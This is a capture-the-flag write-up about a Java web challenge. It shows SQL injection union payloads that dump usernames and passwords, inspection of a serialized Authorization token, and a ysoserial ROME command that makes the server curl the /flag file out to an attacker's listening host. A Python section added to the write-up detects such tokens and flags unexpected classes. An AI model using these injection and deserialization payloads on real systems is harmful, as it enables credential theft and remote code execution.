Open the challenge attachment.
It is presumably related to SQL injection. Open sqldict.class and find the code that connects to the database and the database query statement.
Get started: capture the packet with Burp and send it to Repeater.
This is the request URL; build the request and add the injection payload based on the source code.
Select TABLE_COMMENT from INFORMATION_SCHEMA.TABLES Where table_schema = 'myapp?a=' union select 1#' and table_name='" + TableName
// table name is user; finally determined the columns id, name, pwd
myapp?a=' union select (select name from user)#
myapp?a=' union select (select pwd from user)#
This yields name and pwd.
The code also imports the package io.swagger.annotations.ApiOperation;
Swagger
Swagger is a specification and complete framework for generating, describing, invoking and visualizing RESTful web services. The overall goal is to have the client and the documentation update at the same pace as the server. Documenting methods, parameters and models is tightly integrated into the server-side code, allowing the API to always stay in sync.
Swagger UI provides a visual UI page to display the description file. Interface callers, testers, project managers, etc. can view the related interfaces and make simple interface requests on this page. The project supports online import of description files and local deployment of the UI project.
Visit URL: /swagger-ui.html
Open the challenge URL page for interface testing.
Test login on this interface with "Try it out".
The returned data starts with rO0AB, which is Java serialized data, submitted for identity authentication.
Returned: user login success.
The new version uses b = base64.b64decode(a).hex() in place of the above b= line.
SerializationDumper is a tool that complements ysoserial and is used to parse serialized data.
Download: Releases NickstaDB/SerializationDumper GitHub
Analysis
This amounts to first base64 decoding the server's token data and then deserializing it.
Attack
The ctfhub account name can be seen in the response packet, which means the account name is obtained by deserializing the token.
The cause of the vulnerability is that when viewing the current user's information, the data in the request packet is deserialized and returned.
Attack with ysoserial
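A defender-side check for what is observed above (an Authorization token that base64-decodes to a Java object stream): added example in Python, not code from the challenge or the original writeup. It flags tokens carrying the rO0AB / 0xACED0005 header and lists the class names the stream would instantiate, so anything outside an allowlist can be rejected before deserialization; ALLOWED_PREFIXES and the sample class names are assumptions.

```python
import base64
import re
import struct

# Java serialization header: STREAM_MAGIC 0xACED + STREAM_VERSION 0x0005.
# Base64 of these four bytes begins with "rO0AB", the prefix seen in the token.
STREAM_MAGIC = b"\xac\xed\x00\x05"
TC_CLASSDESC = 0x72  # followed by u2 length, class name, u8 serialVersionUID
# Hypothetical allowlist: the only packages the app should ever carry in its token.
ALLOWED_PREFIXES = ("java.lang.", "java.util.", "com.example.myapp.")
_CLASS_NAME = re.compile(rb"^[A-Za-z_$\[][\w$.;\[]*$")

def is_java_stream(token: str) -> bool:
    """True if the base64 token decodes to a Java serialization stream."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return raw.startswith(STREAM_MAGIC)

def class_names(raw: bytes) -> list:
    """Heuristic scan for TC_CLASSDESC records (the class list SerializationDumper
    shows). Not a full parser: a string value shaped like a record could match."""
    names, i = [], len(STREAM_MAGIC)
    while i + 3 <= len(raw):
        if raw[i] == TC_CLASSDESC:
            (length,) = struct.unpack(">H", raw[i + 1:i + 3])
            name = raw[i + 3:i + 3 + length]
            if 0 < length == len(name) and _CLASS_NAME.match(name):
                names.append(name.decode("ascii"))
                i += 3 + length + 8  # skip the name and the serialVersionUID
                continue
        i += 1
    return names

def triage(token: str) -> dict:
    """Report whether a token is a Java object stream and which classes it names."""
    if not is_java_stream(token):
        return {"java_stream": False, "classes": [], "unexpected": []}
    classes = class_names(base64.b64decode(token))
    unexpected = [c for c in classes if not c.startswith(ALLOWED_PREFIXES)]
    return {"java_stream": True, "classes": classes, "unexpected": unexpected}

def sample_token(class_name: str) -> str:
    """Constructed sample: a stream holding one object of a field-less class."""
    name = class_name.encode("ascii")
    body = (STREAM_MAGIC + b"\x73" + bytes([TC_CLASSDESC])  # TC_OBJECT, TC_CLASSDESC
            + struct.pack(">H", len(name)) + name + b"\x00" * 8  # name, serialVersionUID
            + b"\x02\x00\x00"  # SC_SERIALIZABLE flag, zero fields
            + b"\x78\x70")  # TC_ENDBLOCKDATA, TC_NULL superclass
    return base64.b64encode(body).decode("ascii")
```

Any token for which triage() reports unexpected classes should be rejected outright; the real fix is not to deserialize untrusted tokens at all, or to enforce the same allowlist with an ObjectInputFilter on the server.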
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME "curl xx.xx.xx.xx:xxxx -d @/flag" > xiaodi.bin
// xx.xx.xx.xx:xxxx is the server IP and the port that will be listening shortly
ROME is an open source library for RSS feeds.
Generate the bin file, base64 encode it, and change the file name.
After running, capture the packet, put the printed output into Authorization, and send it.
The local server is listening.